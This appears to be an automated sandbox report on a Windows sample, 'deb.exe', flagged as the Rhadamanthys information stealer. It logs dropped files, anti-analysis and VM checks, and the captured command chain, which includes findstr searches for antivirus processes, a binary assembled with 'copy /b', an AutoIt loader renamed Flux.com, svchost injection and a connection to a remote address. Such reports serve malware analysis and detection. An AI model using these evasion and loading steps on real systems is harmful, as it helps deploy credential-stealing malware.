                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\deb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: deb.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: deb.exeStatic file information: File size 2844594 > 1048576
                Source: deb.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wkernel32.pdb source: svchost.exe, 00000012.00000003.2546257453.0000000004F60000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546001305.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdb source: svchost.exe, 00000012.00000003.2544333364.0000000005030000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2544063531.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000012.00000003.2545512120.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2545155192.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000012.00000003.2544333364.0000000005030000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2544063531.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: svchost.exe, 00000012.00000003.2545512120.0000000004FE0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2545155192.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000012.00000003.2546257453.0000000004F60000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.2546001305.0000000004E40000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702039AB0 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_00007FF702039AB0
                Source: downloaded_exe.exe.0.drStatic PE information: real checksum: 0x13a887 should be: 0x13ea98
                Source: deb.exeStatic PE information: section name: .xdata
                Source: deb.exeStatic PE information: section name: /4
                Source: deb.exeStatic PE information: section name: /19
                Source: deb.exeStatic PE information: section name: /31
                Source: deb.exeStatic PE information: section name: /45
                Source: deb.exeStatic PE information: section name: /57
                Source: deb.exeStatic PE information: section name: /70
                Source: deb.exeStatic PE information: section name: /81
                Source: deb.exeStatic PE information: section name: /97
                Source: deb.exeStatic PE information: section name: /113
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D588E push eax; iretd 18_3_028D589D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D58BC pushad ; ret 18_3_028D58C1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D18C0 push ebp; retf 18_3_028D18C1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D28ED push ebx; ret 18_3_028D28E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D5606 pushad ; retf 18_3_028D5619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D6012 push 00000038h; iretd 18_3_028D601D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D225D push eax; ret 18_3_028D225F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D278B push ebx; ret 18_3_028D28E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D5FEE push FFFFFFD2h; retf 18_3_028D6011
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D0FEA push eax; ret 18_3_028D0FF5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D5F0C push es; iretd 18_3_028D5F0D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D4920 push 0000002Eh; iretd 18_3_028D4922
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D1179 push FFFFFF82h; iretd 18_3_028D117B

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\542181\Flux.comJump to dropped file
                Source: C:\Users\user\Desktop\deb.exeFile created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\542181\Flux.comJump to dropped file
                Source: C:\Users\user\Desktop\deb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comAPI/Special instruction interceptor: Address: 7FFDB442D044
                Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 510B83A
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHAT
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE4P
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                Source: C:\Users\user\Desktop\deb.exeAPI coverage: 1.6 %
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_00406301 FindFirstFileW,FindClose,4_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406CC7
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\542181Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\542181\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: Amcache.hve.24.drBinary or memory string: VMware
                Source: Amcache.hve.24.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.24.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.24.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.24.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.24.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.24.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.24.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.24.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: deb.exe, 00000000.00000002.2267682167.0000025990A1F000.00000004.00000020.00020000.00000000.sdmp, deb.exe, 00000000.00000002.2267682167.00000259909A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2631366746.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2631476564.0000000002C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.24.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: svchost.exe, 00000012.00000002.2631620318.0000000002ED0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: FvMCI
                Source: svchost.exe, 00000012.00000002.2631391542.0000000002C41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                Source: deb.exe, 00000000.00000002.2267682167.0000025990A0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
                Source: Amcache.hve.24.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.24.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.24.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.24.drBinary or memory string: vmci.sys
                Source: Amcache.hve.24.drBinary or memory string: vmci.syshbin`
                Source: deb.exe, 00000000.00000002.2267682167.0000025990A1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\
                Source: Amcache.hve.24.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.24.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: svchost.exe, 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                Source: Amcache.hve.24.drBinary or memory string: VMware20,1
                Source: Amcache.hve.24.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.24.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.24.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.24.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.24.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.24.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.24.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.24.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.24.drBinary or memory string: VMware Virtual RAM
                Source: svchost.exe, 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                Source: Amcache.hve.24.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.24.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70203E5B0 free,IsDebuggerPresent,RaiseException,mbstowcs,malloc,mbstowcs,free,0_2_00007FF70203E5B0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702039AB0 GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_00007FF702039AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_028D0283 mov eax, dword ptr fs:[00000030h]18_3_028D0283
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF7020211B0 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_amsg_exit,0_2_00007FF7020211B0
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70211D668 SetUnhandledExceptionFilter,0_2_00007FF70211D668
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF702039DF9 SetUnhandledExceptionFilter,0_2_00007FF702039DF9

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.35.36.120 7957Jump to behavior
                Source: C:\Users\user\Desktop\deb.exeProcess created: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe "C:\Users\user\AppData\Local\Temp\downloaded_exe.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 542181Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "exports" Fleece Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\542181\Flux.com Flux.com bJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\542181\Flux.comProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                Source: Flux.com, 0000000E.00000000.2310424124.0000000000953000.00000002.00000001.01000000.00000008.sdmp, Fo.4.dr, Flux.com.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\deb.exeCode function: 0_2_00007FF70203B120 GetSystemTimeAsFileTime,0_2_00007FF70203B120
                Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exeCode function: 4_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,4_2_00406831
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: svchost.exe, 00000012.00000002.2631500679.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                Source: Amcache.hve.24.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.24.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.24.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.24.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.24.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected RHADAMANTHYS Stealer
                Source: Yara matchFile source: 00000012.00000003.2542694593.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2631620318.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected RHADAMANTHYS Stealer
                Source: Yara matchFile source: 00000012.00000003.2542694593.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
